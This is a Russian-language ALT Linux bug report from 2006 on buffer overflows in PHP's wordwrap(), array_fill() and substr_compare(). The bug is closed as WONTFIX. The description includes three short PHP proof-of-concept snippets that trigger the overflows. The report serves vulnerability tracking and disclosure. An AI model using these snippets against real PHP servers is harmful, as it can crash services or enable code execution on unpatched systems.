Bug 9462 - Выполнение произвольного кода в PHP и отказ в обслуживании
Summary: Выполнение произвольного кода в PHP и отказ в обслуживании
Status: CLOSED WONTFIX
Alias: None
Product: ALT Linux 2.4
Classification: Archive
Component: php (show other bugs)
Version: 2.4
Hardware: all Linux
: P2 critical
Assignee: Alexey Gladkov
QA Contact: Andrey Cherepanov
URL: http://www.securitylab.ru/vulnerabili...
Keywords:
Depends on:
Blocks:
 
Reported: 2006-04-25 11:04 MSD by Serg Rychka
Modified: 2008-02-15 19:04 MSK (History)
2 users (show)

See Also:

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Serg Rychka 2006-04-25 11:04:47 MSD 
Удаленный пользователь может вызвать отказ в обслуживании или выполнить
произвольный код на целевой системе.

Переполнение буфера обнаружено в функциях wordwrap(),array_fill() и
substr_compare(). Удаленный пользователь, контролирующий входные параметры
функций, может вызвать отказ в обслуживании или выполнить произвольный код на
целевой системе. Примеры:

<?
$a = str_repeat ("A",438013);
$b = str_repeat ("B",951140);
wordwrap ($a,0,$b,0);
?>

<?array_fill  (1,123456789,"Infigo-IS");?>

<?substr_compare ("A","A",12345678);?> 

См. также: http://www.securitylab.ru/vulnerability/265300.php
Comment 1 Michael Shigorin 2008-02-15 19:04:14 MSK 
apparently wontfix